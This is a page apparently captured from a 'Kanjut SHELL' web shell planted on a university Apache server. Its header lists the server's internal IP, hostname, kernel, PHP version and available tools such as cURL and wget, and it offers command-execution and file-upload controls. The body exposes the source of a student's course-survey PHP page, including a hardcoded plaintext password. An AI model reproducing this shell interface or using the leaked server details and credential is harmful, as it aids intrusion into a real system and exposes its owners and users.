Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 18.225.175.230
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/mdwiberg/www/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/mdwiberg/www/SecureCourseSurvey.php
<?php	session_start();

	$pass = $_POST['pass'];
	$_SESSION['psw'] = $pass;
	if($pass != "ch7hw")
		print "Incorrect. <P> Go away!";
	else
	{
?>

<style>

hr
{
  background-color: gray;
}

h1  
{
  color: indigo;
  font-size: 200%;
}
</style>


<center>
<h1>
Welcome to the Survey
</h1>
<hr size="10">
<form action=SecureSurvey.php method=post>
<P>
<b>
Type your name: 
</b>
<INPUT type=text name=name>
<P>
<b>
List your course number:
</b>
<INPUT type=text name=course>
<P>
<b>
Gender:
</b>
Male: <INPUT type=radio name=gd value=ma>
Female: <INPUT type=radio name=gd value=fe>
<P>
<b>
Grade:
</b>
Freshman: <INPUT type=radio name=ge value=fr>
Sophmore: <INPUT type=radio name=ge value=so>
Junior: <INPUT type=radio name=ge value=jr>
Senior: <INPUT type=radio name=ge value=sr>
<P>

<INPUT type=submit value=Submit>
<INPUT type=reset value=Reset>

<?php
	}
?>

Stv3n404 - 2023